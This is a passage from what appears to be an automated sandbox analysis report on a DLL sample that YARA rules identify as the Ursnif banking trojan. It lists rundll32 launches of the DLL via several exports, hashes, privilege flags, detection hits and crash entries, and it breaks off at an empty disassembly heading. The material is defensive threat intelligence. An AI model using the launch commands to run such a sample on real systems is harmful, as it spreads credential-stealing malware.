                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                                                                                      Imagebase:0x290000
                                                                                      File size:61952 bytes
                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Analysis Process: rundll32.exe PID: 4596 Parent PID: 6316

                                                                                      General

                                                                                      Start time:00:36:13
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                                                                                      Imagebase:0x290000
                                                                                      File size:61952 bytes
                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Analysis Process: rundll32.exe PID: 4348 Parent PID: 6316

                                                                                      General

                                                                                      Start time:00:36:20
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                                                                                      Imagebase:0x290000
                                                                                      File size:61952 bytes
                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Analysis Process: WerFault.exe PID: 4400 Parent PID: 4668

                                                                                      General

                                                                                      Start time:00:37:49
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632
                                                                                      Imagebase:0xef0000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: WerFault.exe PID: 4792 Parent PID: 4596

                                                                                      General

                                                                                      Start time:00:37:55
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 640
                                                                                      Imagebase:0xef0000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: WerFault.exe PID: 6964 Parent PID: 4348

                                                                                      General

                                                                                      Start time:00:37:59
                                                                                      Start date:12/10/2021
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 640
                                                                                      Imagebase:0xef0000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >